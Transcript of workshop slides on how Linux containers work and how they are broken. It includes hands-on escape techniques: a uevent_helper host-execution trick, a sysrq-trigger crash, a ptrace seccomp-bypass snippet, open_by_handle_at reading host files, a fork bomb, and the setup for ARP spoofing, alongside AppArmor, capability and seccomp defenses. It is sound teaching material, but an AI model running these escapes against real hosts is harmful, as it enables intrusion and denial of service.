コンテナの作り方、壊し方 / Container Structure and Exploitation Method

mrtc0
November 10, 2018


Slides from Security Mini Camp 2018 in Ehime. #seccamp


Transcript

  1. Container Structure and Exploitation Method (コンテナの作り方、壊し方)
    Let's learn container security
    Kohei Morita @mrtc0
    GMO Pepabo, Inc.
    Security Mini Camp in Ehime

  2. GMO Pepabo Security Countermeasures Office
    Kohei Morita @mrtc0
    https://blog.ssrf.in

  3. Participated in the Security Camp national event
    SECCON Beginners lecturer
    Web vulnerability assessment (part-time) at Ierae Security while at university
    IPA MITOU Creator
    Joined GMO Pepabo, Inc.

  4. Introduction
    • These slides are a partly modified version of a talk given together with my colleague Uchio Kondo (@udzura) at the Kyushu Security Conference
    • "Understanding container security from the inside"
    • https://speakerdeck.com/udzura/inside-out-container-and-its-security
    • Used with permission, with some modifications
    • Thanks to @udzura for kindly agreeing

  5. Introduction
    • This session is mostly hands-on, so if you get stuck, ask the people near you or a tutor
    • If a command fails or you are not sure what to do, just ask
    • A cheat sheet is provided, please make use of it
    • It is fine to work through the exercises while talking with your group
    • Please talk to each other actively!

  6. Agenda
    What is container virtualization?
    Let's peek at how containers work
    Let's build a container
    The container security model and attack surfaces
    Let's break a container

  7. Today's goals
    Get a rough understanding of how containers work
    Learn the security mechanisms of containers
    Experience the Swiss cheese model

  8. What is container virtualization?

  9. Has anyone used the following software?

  10. Virtualization

  11. "Conventional" virtualization
    (diagram: hardware → host OS / hypervisor → hardware emulation per VM → guest OS → libraries → programs)

  12. (same diagram as slide 11)

  13. Container virtualization
    (diagram: hardware → host OS (Linux) → container engine per container → libraries → programs)
    OS functions are used in common
    Containers use the same kernel as the host

  14. Where are containers used?

  15. How containers are used
    https://en.wikipedia.org/wiki/Kubernetes

  16. Container security
    The implementation of the container runtime itself
    The container's security policy
    Container networking
    Orchestration and managed services

  17. Container implementations

  18. LXC
    HACONIWA
    rkt

  19. Advantages of containers (pros)

  20. Advantages of containers
    Fast startup, lightweight
    Resources can be controlled flexibly and at fine granularity

  21. Advantages of containers
    Fast startup, lightweight
    Resources can be controlled flexibly and at fine granularity
    Well suited to the cloud
    Containerize the whole application for fast deployment and development

  22. Disadvantages of containers (cons)

  23. Privilege separation vs. resource efficiency
    (chart: hypervisor-based, software-based and container-based virtualization plotted against privilege separation and resource efficiency)
    Containers have weak privilege separation

  24. Let's peek inside a container

  25. How does a container become a container?

  26. Has anyone seen the following screen?

  27. Process

  28. A container is a process

  29. $ ./a.out
    (diagram: a.out → libraries → system calls → Linux kernel)

  30. a.out
    $ ps xf -C a.out
    3262 ? S 0:00 sshd: vagrant@pts/2
    3263 pts/2 Ss 0:00 \_ -bash
    3372 pts/2 S+ 0:00 \_ ./a.out

  31. (same output as slide 30)

  32. $ ./a.out
    (diagram: the parent process (bash etc.) calls fork(2) and wait(2); the child process calls execve(2) to run the new program, e.g. execve("/bin/cat", …))

  33. $ ./a.out
    (same diagram as slide 32, with "special processing" inserted between fork(2) and execve(2))

  34. A container is a special process

  35. The difference between an ordinary process and a container
    • A container is a special process
    • Concretely:
      it is given a resource space independent from the host, and
      the hardware resources and so on that it can use from the host are restricted,
      so that it gets its own isolated working space

  36. The difference between an ordinary process and a container
    • A container is a special process
    • Concretely:
      it is given a resource space independent from the host (Linux Namespace), and
      the hardware resources and so on that it can use from the host are restricted (cgroups),
      so that it gets its own isolated working space

  37. Confirm that "a container is a process"

  38. Starting a Docker container
    $ docker ps -a
    CONTAINER ID IMAGE COMMAND
    4521880cffa8 minicamp-1 "/usr/sbin/apache2ct…"
    $ docker start 4521
    $ curl localhost:8080 -s | grep ''
    Apache2 Ubuntu Default Page: It works

  39. Check the process tree
    Look at the process tree that Docker creates:
    $ ps auxf
    Start apache directly on the host and look at the process tree again:
    $ sudo apt-get install apache2 && sudo systemctl start apache2

  40. Linux Namespace

  41. Inspecting Linux Namespaces
    $ docker ps
    CONTAINER ID IMAGE COMMAND
    4521880cffa8 minicamp-1 "/usr/sbin/apache2ct…"
    $ docker exec -ti 45 bash # "attach" to the container
    # ip a # inspect the network inside the container
    # exit # leave the container
    $ ip a # compare with the host's network

  42. $ ip a # host side
    2: enp0s3: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
    valid_lft forever preferred_lft forever
    inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
    valid_lft forever preferred_lft forever
    # ip a # Docker container side
    10: eth0@if11: mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
    valid_lft forever preferred_lft forever

  43. (same output as slide 42)
    Although the container is a process on the same machine, it has been given an independent network

  44. Check the other Linux Namespaces too
    $ docker exec -ti 45 hostname
    4521880cffa8
    $ hostname
    ubuntu-xenial
    • Confirm that the hostname differs as well

  45. Check the other Linux Namespaces too
    • Processes have a process ID (PID), but its numbering is "independent"
    • Confirm that different processes are assigned the same PID
    $ docker exec -ti 45 ps auxf
    $ ps auxf

  46. Picture
    (diagram: host-1 192.168.1.1/24 running the host OS (Linux), with container-1 172.16.1.1/24 and container-2 10.1.1.1/24)
    • Processes are "isolated"; OS functions are shared with the host.

  47. Where can Namespaces be inspected?

  48. Looking at Namespaces
    Find the PID of the container's Apache as seen from the host:
    $ ps auxf | grep -A 10 docker[d]
    Inspect the following directory:
    $ sudo ls -l /proc/$PID/ns
    Check what the host side looks like and eyeball-diff the two:
    $ sudo ls -l /proc/self/ns

  49. $ sudo ls -l /proc/3625/ns
    total 0
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274]
    lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275]
    $ sudo ls -l /proc/self/ns
    total 0
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838]
    Eyeball-diff the two listings

  50. Enter the Namespace
    • Attach only to the network namespace
      How does the output of ip a compare with the Docker host?
      What does hostname print?
    $ sudo nsenter --net -t $PID
    $ sudo nsenter --uts -t $PID

  51. Linux Namespaces
    Namespace: what it isolates
    PID namespace: PIDs
    Mount namespace: the filesystem tree
    IPC namespace: IPC
    Network namespace: network interfaces
    UTS namespace: the hostname
    User namespace: UIDs and GIDs
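As an added example (not part of the slides), here is the eyeball-diff of slide 49 done in C: it parses the inode numbers out of the /proc/<pid>/ns link targets and reports which namespaces two processes share, so a container launched with host networking or the host PID space stands out immediately. The inode sets are copied from slide 49; on that Docker setup only the cgroup and user namespaces are shared with the host, which is also why uid 0 in the container is uid 0 on the host.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NS_COUNT 7
/* The namespace links under /proc/<pid>/ns on the kernel used in the slides, in ls -l order */
static const char *NS_NAMES[NS_COUNT] = {"cgroup", "ipc", "mnt", "net", "pid", "user", "uts"};

/* Inode numbers copied from slide 49: the container's Apache (PID 3625) and the host shell (self) */
const unsigned long SLIDE_CONTAINER_NS[NS_COUNT] = {
    4026531835UL, 4026532276UL, 4026532274UL, 4026532279UL,
    4026532277UL, 4026531837UL, 4026532275UL};
const unsigned long SLIDE_HOST_NS[NS_COUNT] = {
    4026531835UL, 4026531839UL, 4026531840UL, 4026531957UL,
    4026531836UL, 4026531837UL, 4026531838UL};

/* Extract the inode from a link target such as "net:[4026532279]"; returns 0 on malformed input */
unsigned long ns_inode_from_link(const char *target)
{
    const char *lb = strchr(target, '[');
    if (lb == NULL)
        return 0;
    char *end;
    unsigned long ino = strtoul(lb + 1, &end, 10);
    return (end != lb + 1 && *end == ']') ? ino : 0;
}

/* Read the namespace inodes of /proc/<pid>/ns into inos[]; a missing link yields 0.
 * Returns how many links were read, so 0 means the PID does not exist (or this is not Linux). */
int read_ns_inodes(const char *pid, unsigned long inos[NS_COUNT])
{
    int ok = 0;
    for (int i = 0; i < NS_COUNT; i++) {
        char path[64], buf[64];
        snprintf(path, sizeof path, "/proc/%s/ns/%s", pid, NS_NAMES[i]);
        ssize_t n = readlink(path, buf, sizeof buf - 1);
        inos[i] = 0;
        if (n < 0)
            continue;
        buf[n] = '\0';
        inos[i] = ns_inode_from_link(buf);
        ok += inos[i] != 0;
    }
    return ok;
}

/* Bitmask (bit i = NS_NAMES[i]) of namespaces the two processes share; a container that
 * shares net, pid or mnt with the host was started with that isolation switched off */
unsigned shared_namespace_mask(const unsigned long a[NS_COUNT], const unsigned long b[NS_COUNT])
{
    unsigned mask = 0;
    for (int i = 0; i < NS_COUNT; i++)
        if (a[i] != 0 && a[i] == b[i])
            mask |= 1u << i;
    return mask;
}

void report_shared(unsigned mask)
{
    printf("namespaces shared with the other process:");
    for (int i = 0; i < NS_COUNT; i++)
        if (mask & (1u << i))
            printf(" %s", NS_NAMES[i]);
    printf("%s\n", mask ? "" : " (none)");
}

int main(int argc, char **argv)
{
    /* With two PIDs on the command line (e.g. 3625 self) compare live processes; otherwise use slide 49 */
    unsigned long a[NS_COUNT], b[NS_COUNT];
    if (argc == 3 && read_ns_inodes(argv[1], a) && read_ns_inodes(argv[2], b))
        report_shared(shared_namespace_mask(a, b));
    else
        report_shared(shared_namespace_mask(SLIDE_CONTAINER_NS, SLIDE_HOST_NS));
    return 0;
}
```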

  52. Advantages of containers
    Fast startup, lightweight
    Resources can be controlled flexibly and at fine granularity

  53. Check the container's memory allocation
    Check the memory allocation:
    $ CID=$(docker inspect -f '{{.ID}}' 45)
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes
    Create a container with a smaller allocation and compare:
    $ CID2=$(docker run --memory=8m -d minicamp-1)
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

  54. Compare
    Confirm that the container's processing speed differs depending on whether the limit is set:
    $ docker exec -ti $CID bash
    $ docker exec -ti $CID2 bash
    • Try running apt-get update in each
    Change the memory limit directly and confirm that the behaviour improves:
    $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
    $ docker exec -ti $CID2 bash
    root@d6a2825b878a:/# apt-get update

  55. What cgroups can control
    • CPU
    • Memory
    • Disk I/O bandwidth
    • Number of processes
    • etc.

  56. Let's build a container

  57. Haconiwa
    • A Linux container runtime developed by @udzura (GMO Pepabo) and others
    • Its distinguishing feature is that configuration and hooks are written in mruby
    • https://github.com/haconiwa/haconiwa
    $ haconiwa version
    haconiwa: v0.9.5

  58. Create the image (rootfs)
    $ mkdir /tmp/minicamp
    $ docker export 45 | sudo tar -xv -f - -C /tmp/minicamp/
    $ ls /tmp/minicamp/
    bin boot dev etc home lib lib64 media mnt opt proc root
    run sbin srv sys tmp usr var

  59. Generate the configuration file
    $ haconiwa init first-container.haco
    assign new haconiwa name = haconiwa-4ad5ea68
    assign rootfs location = /var/lib/haconiwa/4ad5ea68
    create first-container.haco

  60. Edit the configuration
    # -*- mode: ruby -*-
    Haconiwa.define do |config|
      # The container name and container's hostname:
      config.name = "haconiwa-4ad5ea68"
      # The first process when invoking haconiwa run:
      config.init_command = "/bin/bash"
      # If your first process is a daemon, please explicitly daemonize by:
      # config.daemonize!
      . . .
      # The rootfs location on your host OS
      # Pathname class is useful:
      root = Pathname.new("/tmp/minicamp")
      config.chroot_to root
    end

  61. Start the container
    $ haconiwa run first-container.haco
    Create lock: #
    Container fork success and going to wait: pid=6855
    groups: cannot find name for group ID 1000
    root@haconiwa-4ad5ea68:/# ps ax
    PID TTY STAT TIME COMMAND
    1 pts/3 S 0:00 /bin/bash
    8 pts/3 R+ 0:00 ps ax

  62. Build one from scratch

  63. First, with only fork/execve/chroot
    # test.rb, run with hacorb (haconiwa's mruby)
    pid = Process.fork do
      Dir.chroot "/tmp/minicamp/"    # the rootfs exported on slide 58
      Dir.chdir "/"
      Exec.execve ENV, "/bin/bash"
    end
    p(Process.waitpid2 pid)
    $ hacorb test.rb
    bash-4.3$ pwd
    /
    bash-4.3$ ls
    bin boot dev etc home lib lib64 media mnt opt proc root
    run sbin srv sys tmp usr var

  64. Isolate the PID namespace
    # unshare the PID namespace first, so the forked child becomes PID 1 of a new one
    Namespace.unshare(Namespace::CLONE_NEWPID)
    pid = Process.fork do
      Dir.chroot "/tmp/minicamp/"
      Dir.chdir "/"
      Exec.execve ENV, "/bin/bash"
    end
    p(Process.waitpid2 pid)
    $ sudo hacorb test.rb
    bash-4.3$ mount -t proc proc /proc
    bash-4.3$ ps aux

  65. Set up a cgroup
    limit = "3"   # at most three processes in the cgroup
    Namespace.unshare(Namespace::CLONE_NEWPID)
    pid = Process.fork do
      Dir.mkdir "/sys/fs/cgroup/pids/minicamp" rescue nil
      system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max"
      # move this child process into the cgroup before exec
      system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks"
      Dir.chroot "/tmp/minicamp/"
      Dir.chdir "/"
      Exec.execve ENV, "/bin/bash"
    end
    p(Process.waitpid2 pid)
    $ sudo hacorb test.rb
    # ( echo 'test' | cat )
    # bomb () { bomb | bomb & }; bomb

  66. Summary so far
    • Seen from the host, a container is just a process
    • It combines the containerization features that Linux provides
    • Increasing the isolation of a process (Namespace)
    • Allocating resources (cgroup)
    • There are others too

  67. Short break

  68. The container security model and attack surfaces

  69. Container security mechanisms
    • Isolation by Linux Namespaces
    • Resource control by cgroups

  70. Container security mechanisms
    • Isolation by Linux Namespaces
    • Resource control by cgroups
    • AppArmor
    • seccomp
    • Dropping permissions on specific files

  71. Container virtualization
    (same diagram as slide 13: hardware → host OS (Linux) → container engines → libraries → programs; OS functions are used in common and the host kernel is shared)

  72. Attack surfaces
    (diagram: kernel; containers; user; security policy)

  73. Attack surfaces
    Exploit a kernel vulnerability

  74. Attack surfaces
    Exploit a container misconfiguration
    e.g. docker --privileged

  75. Attack surfaces
    Exploit a network misconfiguration

  76. Attack surfaces
    (same as slide 75)

  77. Swiss cheese model
    • Some of the security mechanisms used for containers overlap in function
    • For example, a particular system call may be blocked by both Capabilities and seccomp
    • Even if one mechanism is bypassed, another mechanism blocks or mitigates the attack

  78. Let's break a container

  79. Container Security
    Isolation of OS resources (process, filesystem, etc.)
    • chroot / pivot_root
    • Linux Namespace
    • seccomp
    • Linux Capability
    • cgroups
    • SELinux / AppArmor
    Restriction of privileges and functionality (permissions, syscalls)
    Limiting OS resources (CPU, memory)
    Access control (denying access to specific files)

  80. AppArmor
    • A container shares some files with the host
    • Some of those files affect the host if they can be read or written
    • ex. /proc/kcore, /proc/sysrq-trigger
    • They are mounted read-only or controlled with AppArmor
    • Let's see what happens if they can be written to!

  81. /sys/kernel/uevent_helper
    • A uevent is an event the kernel sends when a device is added or removed
    • When a uevent is sent, the program at the path written in uevent_helper is executed
    • uevents can be sent from userland
      • /sys/devices/virtual/mem/null/uevent
      • /sys/class/mem/null/uevent

  82. Start the container and set it up
    $ haconiwa start sample1.haco
    root@sample:/# echo "export PATH=$PATH" >> /root/.bashrc
    root@sample:/# bash
    root@sample:/# apt-get install gcc

  83. Let's escape from the container
    $ haconiwa start sample1.haco
    root@sample:/# cat /root/hello.sh # write it with your favourite editor
    #!/bin/sh
    echo "Hello, Host! ;)" > /tmp/hello.txt
    root@sample:/# chmod +x /root/hello.sh
    root@sample:/# echo "/var/lib/haconiwa/sample/root/hello.sh" > /sys/kernel/uevent_helper

  84. Let's escape from the container
    $ ls /tmp/
    root@sample:/# echo change > /sys/class/mem/null/uevent
    $ ls /tmp
    hello.txt
    $ cat /tmp/hello.txt
    hello host! ;)

  85. /proc/sysrq-trigger
    root@sample1:/# echo c > /proc/sysrq-trigger
    • Writing particular characters to /proc/sysrq-trigger can reboot the host or trigger a kernel panic

  86. AppArmor
    deny /usr/bin/top mrwklx, # deny reading, writing and executing the top command
    • Performs mandatory access control (MAC) on files and sockets, per program
    • mrwklx are access modes: r is read, w is write, x is execute
    • http://manpages.ubuntu.com/manpages/bionic/man5/apparmor.d.5.html

  87. Let's block it
    $ cat apparmor/haconiwa-test

    deny /usr/bin/top mrwklx,
    deny @{PROC}/sysrq-trigger rwklx,

    • Apply the haconiwa-test profile to the sample1 container

  88. Let's block it
    $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/
    $ sudo apparmor_parser -Kr \
    /etc/apparmor.d/haconiwa/haconiwa-test
    $ cat sample1.haco

    config.apparmor = "haconiwa-test"

    • Apply the haconiwa-test profile to the sample1 container

  89. Let's block it
    $ haconiwa start sample1.haco
    root@sample1:/# top
    bash: /usr/bin/top: Permission denied
    root@sample1:/# echo c > /proc/sysrq-trigger
    bash: /proc/sysrq-trigger: Permission denied

  90. Protection by AppArmor
    • Mounting read-only, or using AppArmor, restricts which commands can be executed and which files can be read or written inside the container
      • /proc/sysrq-trigger
      • /proc/sys/kernel/core_pattern
      • /proc/sys/kernel/modprobe
      • /sys/kernel/uevent_helper

  91. seccomp
    • A mechanism for filtering system calls
    • Blocks dangerous system calls that could allow an escape to the host side
    root@sample1:/# mkdir /tmp/hoge
    Bad system call

  92. Let's try seccomp
    $ cat sample2.haco
    config.seccomp.filter(default: :allow) do |rule|
      rule.kill :mkdir # deny mkdir(2)
    end
    $ sudo haconiwa start sample2.haco
    root@sample1:/# mkdir /tmp/hoge
    Bad system call

  93. Blocked system calls
    syscall: what it does
    kexec_load: loads a new kernel
    init_module: loads a kernel module
    finit_module: loads a kernel module
    delete_module: removes a kernel module
    open_by_handle_at: opens the file corresponding to a handle

  94. Bypassing seccomp
    • seccomp-based sandbox environments can be escaped
    • Even when mkdir(2) is blocked, the filter can be evaded
    • Never allow the use of ptrace(2)!
    • A tracer can modify the process's system calls and bypass the filter
    • However, this only works on older Linux kernel versions

  95. Let's bypass seccomp
    root@sample1:~/# ls
    bypass_seccomp.c
    root@sample1:~/# mkdir dir
    Bad system call
    root@sample1:~/# gcc bypass_seccomp.c
    root@sample1:~/# ./a.out
    root@sample1:~/# ls -al
    drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # created successfully

  96. (diagram: mkdir → seccomp → Bad system call)

  97. (diagram: getpid → seccomp → ptrace → mkdir)
    The register state for calling getpid(2) is rewritten into the state for calling mkdir(2)

  98. ptrace
    // tracee: stop itself, then issue getpid(2) with mkdir's arguments in the following registers
    kill(getpid(), SIGSTOP);
    syscall(SYS_getpid, SYS_mkdir, "dir", 0777);
    // tracer: at syscall entry, shift the registers so the kernel executes mkdir(2)
    if (regs.orig_rax == SYS_getpid) {
      regs.orig_rax = regs.rdi;
      regs.rdi = regs.rsi;
      regs.rsi = regs.rdx;
      regs.rdx = regs.r10;
      ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    }

  99. Linux Capability

  100. Linux Capability
    • A mechanism for fine-grained control over privileges that only root can use
    • Grant only some of them, or restrict only some of them
    capability: what it allows
    CAP_SYS_ADMIN: mount, etc.
    CAP_SYS_CHROOT: chroot
    CAP_SYS_PTRACE: ptrace
    CAP_NET_RAW: raw sockets (ping, etc.)
    CAP_SYS_BOOT: reboot and kexec_load

  101. Let's try capabilities
    $ haconiwa start sample3.haco
    root@sample1:/# ping 8.8.8.8
    PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms
    ^C
    --- 8.8.8.8 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms

  102. Let's try capabilities
    root@sample1:/# mount /dev/sda1 /mnt/
    root@sample1:/# cat /mnt/etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  103. Dropping capabilities
    $ cat sample3.haco

    config.capabilities.allow :all
    config.capabilities.drop "cap_sys_admin"
    config.capabilities.drop "cap_net_raw"

  104. Without the privilege, the operation fails
    $ haconiwa start sample3.haco
    root@sample1:/# ping 8.8.8.8
    ping: icmp open socket: Operation not permitted
    root@sample1:/# mount /dev/sda1 /mnt/
    mount: permission denied

  105. (same syscall table as slide 93)

  106. open_by_handle_at
    • A system call that opens the file referenced by a file handle
      • requires CAP_DAC_READ_SEARCH
    • It bypasses the permission checks for reading files and directories
    • Any file on the same filesystem as a bind-mounted directory becomes accessible

  107. open_by_handle_at
    int open_by_handle_at(
      int mount_fd,
      struct file_handle *handle,
      int flags);
    struct file_handle {
      unsigned int handle_bytes;  /* Size of f_handle [in, out] */
      int handle_type;            /* Handle type [out] */
      unsigned char f_handle[0];  /* File identifier */
    };

  108. open_by_handle_at
    (struct file_handle as on slide 107)
    The leading bytes hold the inode number of the file to open

  109. open_by_handle_at
    $ stat /etc/passwd
    File: '/etc/passwd'
    Size: 1724 Blocks: 8 IO Block: 4096 regular file
    Device: 801h/2049d Inode: 23125 Links: 1
    struct my_file_handle h = {
      .handle_bytes = 8,
      .handle_type = 1,
      // 23125 = 0x5a55, stored little-endian as 55 5a
      .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
    };

  110. open_by_handle_at
    $ stat /etc/passwd
    File: '/etc/passwd'
    Size: 1724 Blocks: 8 IO Block: 4096 regular file
    Device: 801h/2049d Inode: 57824 Links: 1
    $ haconiwa start sample4.c
    root@sample1:/# vim read_passwd.c
    // Change ex) 57824 = 0xe1e0, stored little-endian as e0 e1
    .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
    };

  111. open_by_handle_at
    root@sample1:/# gcc read_passwd.c
    root@sample1:/# ./a.out
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
    ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
    lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  112. Getting a shell on the host
    root@sample1:/# gcc breakout.c
    root@sample1:/# ./a.out
    $ sudo haconiwa start demo1.haco

  113. Swiss cheese model
    • Some of the security mechanisms used for containers overlap in function
    • For example, a particular system call may be blocked by both Capabilities and seccomp
    • Even if one mechanism is bypassed, another mechanism blocks or mitigates the attack
    • Even if seccomp is bypassed, Capabilities block the attack
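Added example, not from the slides: the Swiss-cheese check for the seccomp section (slides 91 to 98) and the capability section (slides 99 to 111), done from inside a container by reading /proc/<pid>/status. It decodes the CapEff mask and the Seccomp mode and flags the combinations the slides demonstrated: CAP_SYS_ADMIN (mount, slide 102), CAP_DAC_READ_SEARCH (open_by_handle_at, slide 106), CAP_SYS_PTRACE (the bypass on slide 94), CAP_NET_RAW, CAP_SYS_BOOT, and the absence of any seccomp filter. The two status excerpts are constructed samples; the bit numbers are the kernel's capability numbers.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capability bit numbers from <linux/capability.h> for the capabilities discussed above */
enum { CAP_DAC_READ_SEARCH_BIT = 2, CAP_NET_RAW_BIT = 13, CAP_SYS_PTRACE_BIT = 19,
       CAP_SYS_ADMIN_BIT = 21, CAP_SYS_BOOT_BIT = 22 };

/* Findings reported by audit_status(), one bit each */
enum {
    F_SYS_ADMIN = 1,       /* mount(2) works, as on slide 102 */
    F_NET_RAW = 2,         /* raw sockets: ping, but also ARP packet injection */
    F_DAC_READ_SEARCH = 4, /* open_by_handle_at(2) reads any inode, as on slide 106 */
    F_SYS_BOOT = 8,        /* reboot(2) and kexec_load(2) */
    F_SYS_PTRACE = 16,     /* ptrace(2) allowed: the seccomp bypass on slide 94 */
    F_NO_SECCOMP = 32      /* Seccomp field is not 2, i.e. no filter installed */
};

struct status_info {
    uint64_t cap_eff; /* CapEff: effective capability mask */
    int seccomp_mode; /* Seccomp: 0 off, 1 strict, 2 filter; -1 if absent */
};

/* Constructed samples, not slide output: the CapEff mask a default Docker container typically has
 * (seccomp filter on), and a sample3.haco-like set (allow :all, drop cap_sys_admin and cap_net_raw)
 * on a kernel with 38 capability bits and no seccomp filter. */
const char *SAMPLE_DOCKER_DEFAULT =
    "Name:\tbash\nPid:\t1\nCapEff:\t00000000a80425fb\nNoNewPrivs:\t0\nSeccomp:\t2\n";
const char *SAMPLE_ALLOW_ALL_DROP_TWO =
    "Name:\tbash\nPid:\t1\nCapEff:\t0000003fffdfdfff\nNoNewPrivs:\t0\nSeccomp:\t0\n";

/* Value after "Key:" at the start of a line, or NULL when the key is absent */
static const char *field_value(const char *text, const char *key)
{
    size_t klen = strlen(key);
    const char *p = text;
    while (p != NULL && *p != '\0') {
        if (strncmp(p, key, klen) == 0) {
            for (p += klen; *p == '\t' || *p == ' '; p++)
                ;
            return p;
        }
        p = strchr(p, '\n');
        if (p != NULL)
            p++;
    }
    return NULL;
}

/* Fill *out from /proc/<pid>/status text; returns how many of the two fields were found */
int parse_status(const char *text, struct status_info *out)
{
    const char *cap = field_value(text, "CapEff:");
    const char *sec = field_value(text, "Seccomp:");
    out->cap_eff = cap ? strtoull(cap, NULL, 16) : 0;
    out->seccomp_mode = sec ? atoi(sec) : -1;
    return (cap != NULL) + (sec != NULL);
}

int cap_set(uint64_t mask, int bit) { return (int)((mask >> bit) & 1u); }

unsigned audit_status(const struct status_info *s)
{
    unsigned f = 0;
    if (cap_set(s->cap_eff, CAP_SYS_ADMIN_BIT))       f |= F_SYS_ADMIN;
    if (cap_set(s->cap_eff, CAP_NET_RAW_BIT))         f |= F_NET_RAW;
    if (cap_set(s->cap_eff, CAP_DAC_READ_SEARCH_BIT)) f |= F_DAC_READ_SEARCH;
    if (cap_set(s->cap_eff, CAP_SYS_BOOT_BIT))        f |= F_SYS_BOOT;
    if (cap_set(s->cap_eff, CAP_SYS_PTRACE_BIT))      f |= F_SYS_PTRACE;
    if (s->seccomp_mode != 2)                         f |= F_NO_SECCOMP;
    return f;
}

/* Parse and audit in one step; feed it the contents of /proc/self/status inside a container */
unsigned audit_text(const char *text)
{
    struct status_info s;
    parse_status(text, &s);
    return audit_status(&s);
}

int main(void)
{
    printf("docker-default sample: findings 0x%02x\n", audit_text(SAMPLE_DOCKER_DEFAULT));
    printf("sample3-like sample:   findings 0x%02x\n", audit_text(SAMPLE_ALLOW_ALL_DROP_TWO));
    return 0;
}
```

The sample3-like set scores worse than the Docker default even though two capabilities were dropped, because CAP_DAC_READ_SEARCH, CAP_SYS_PTRACE and CAP_SYS_BOOT remain and no seccomp filter backs them up.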

  114. Container networking

  115. Container Network
    • With default settings, LXD creates a bridge
    (diagram: the host's eth0 and the bridge lxdbr0; each container's eth0 is attached to the bridge through a veth pair)

  116. Bridge Network
    $ ip addr show dev lxdbr0
    4: lxdbr0: mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.152.207.1/24 scope global lxdbr0
    valid_lft forever preferred_lft forever
    inet6 fd2e:8281:6de5:9841::1/64 scope global
    valid_lft forever preferred_lft forever
    inet6 fe80::281a:c0ff:fed1:4b28/64 scope link
    valid_lft forever preferred_lft forever

  117. Container Network
    • When you host containers, they receive traffic from the Internet
    • What if a user inside a container could intercept that traffic…?
    (figure: hex dump of a captured packet)

  118. ARP Spoofing
    • Uses the properties of ARP to change routing
    • It works because hosts trust the ARP table (the address mapping table)
    • By forging replies, an attacker can poison the ARP table with wrong entries
    (figure: hex dump of a captured packet)

  119. ARP Table
    vagrant@ubuntu-xenial:~$ lxc list
    attacker | RUNNING | 10.128.193.110 (eth0)
    victim | RUNNING | 10.128.193.231 (eth0)
    vagrant@ubuntu-xenial:~$ arp -a
    ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # victim
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
    ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # attacker
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  120. Confirm connectivity to the container
    vagrant@ubuntu-xenial:~$ lxc exec attacker bash
    root@test1:~# ping 10.128.193.231 # victim ip
    PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data.
    64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms
    ^C
    --- 10.128.193.231 ping statistics ---
